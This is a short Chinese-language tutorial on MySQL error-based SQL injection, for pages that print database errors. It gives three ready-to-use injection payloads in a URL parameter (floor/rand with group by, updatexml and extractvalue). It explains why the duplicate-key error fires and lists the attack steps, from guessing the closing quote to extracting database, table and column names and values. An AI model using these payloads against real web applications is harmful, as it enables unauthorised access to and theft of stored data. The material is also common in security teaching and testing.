一般是在页面没有显示位、但用echo mysql_error();输出了错误信息的时候使用,
它的特点是注入速度快,但是语句较复杂,不能用group_concat(),只能用limit依次猜解
0x01 利用方式
报错注入只要套用公式即可,公式如下(第一个公式count(*)、floor()、rand()、group by不可或缺,后两个公式有32位的限制):
?id=2’ and (select 1 from (select count(*),concat( floor(rand(0)*2),(select (select (查询语句)) from information_schema.tables limit 0,1))x from information_schema.tables group by x )a )--+
?id=2’ and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)--+
?id=1’ and extractvalue(1, concat(0x7e, (select @@version),0x7e))--+
0x02 公式解析
floor()是取整数
rand()在0和1之间产生一个随机数
rand(0)*2将取0到2的随机数
floor(rand()*2)有两条记录就会报错
floor(rand(0)*2)记录需为3条以上,且3条以上必报错,返回的值是有规律的
count(*)是用来统计结果的,相当于刷新一次结果
group by对数据分组时会先看看虚拟表里有没有这个值,若没有就插入,若存在则count(*)加1
group by时floor(rand(0)*2)会被执行一次,若虚表不存在记录,插入虚表时会再执行一次
0x03 注入步骤
猜测闭合字符
猜测列数
尝试得到显示位
报错得到数据库个数
报错得到数据库名
报错得到表名
报错得到列名
得到列值
